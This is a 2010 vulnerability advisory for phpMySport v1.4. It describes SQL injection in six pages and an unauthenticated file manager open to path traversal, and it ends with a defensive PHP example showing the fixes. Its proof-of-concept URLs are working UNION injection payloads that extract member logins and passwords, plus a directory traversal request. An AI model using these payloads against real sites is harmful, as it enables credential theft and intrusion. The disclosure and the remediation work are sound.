#######################################################################
Multiple Vulnerabilities in phpMySport v1.4

Name             : Multiple Vulnerabilities in phpMySport
Systems Affected : phpMySport v1.4
Site             : http://phpmysport.sourceforge.net/en/
Author           : Amol Naik (amolnaik4[at]gmail.com)
Date             : 18/01/2010
#######################################################################

############
OVERVIEW
############

phpMySport v1.4 is vulnerable to the following issues:

1. Multiple SQL Injection
2. Unprotected Access to File Manager

####################
Technical Details
####################

1. Multiple SQL Injection:

Multiple SQL injection instances exist in phpMySport v1.4 when "magic_quotes_gpc = OFF". The injectable values are the v1/v2 request parameters of the member, news, information, team, club and matches pages.

PoC:
+++++
http://localhost/phpmysport/index.php?r=member&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member--+-

http://localhost/phpmysport/index.php?r=news&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15,16,17+from+pms_member--+-

http://localhost/phpmysport/index.php?r=information&v1='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,13,14,15,16,17,18,19+from+pms_member--+-

http://localhost/phpmysport/index.php?r=team&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pms_member--+-

http://localhost/phpmysport/index.php?r=club&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11,12,13,14+from+pms_member--+-

http://localhost/phpmysport/index.php?r=matches&v1=view&v2='+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(member_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member--+-

2. Unprotected Access to File Manager:

Access to the file manager is not protected by authentication, and by supplying dot-dot-slash sequences (/../../) in the current_folder parameter it is possible to view the directory structure of the target system.

PoC:
+++++
http://localhost/phpmysport/index.php?r=file&v1=file_manager&current_folder=/../../../&fen=pop

#############
TimeLine
#############

Bug Discovered    : 01/01/2010
Informed Vendor   : 09/01/2010 -- no response received
Public Disclosure : 18/01/2010
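The two fixes the findings above call for, as an added example that is not phpMySport's own code: a prepared statement for the v2 member lookup, so the value never reaches the SQL text regardless of magic_quotes_gpc, and a realpath() check that confines current_folder to the file-manager root. The pms_member table and the member_login column are taken from the advisory; the member_id column, the PDO connection and the files directory are assumptions.

```php
<?php
// Added example (not phpMySport code). Assumes a PDO connection $pdo and a
// pms_member table with a hypothetical integer member_id column.

// 1. Member lookup with a prepared statement. The v2 value is bound as a
//    parameter, so "' AND 1=2 UNION ALL SELECT ..." is never parsed as SQL.
function findMember(PDO $pdo, string $v2): ?array
{
    // Reject anything that is not a plain decimal id before binding it.
    if (!ctype_digit($v2)) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT member_id, member_login FROM pms_member WHERE member_id = :id'
    );
    $stmt->bindValue(':id', (int) $v2, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2. Confine current_folder to the file-manager root. realpath() resolves
//    every "..", so "/../../../" collapses to a path outside $root and is
//    rejected instead of being listed.
function resolveFolder(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    $target   = realpath($root . '/' . $requested);
    if ($rootReal === false || $target === false) {
        return null;                        // root or target does not exist
    }
    // Prefix check with a trailing separator so "/files2" cannot pass as "/files".
    if ($target !== $rootReal
        && strpos($target, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;                        // escaped the file-manager root
    }
    return $target;
}

// Usage sketch (hypothetical paths and session key). The file manager must
// also require an authenticated session, which is the second finding above.
// if (!isset($_SESSION['member_id'])) { http_response_code(403); exit; }
// $folder = resolveFolder('/var/www/phpmysport/files',
//                         $_GET['current_folder'] ?? '');
// if ($folder === null) { http_response_code(400); exit; }
```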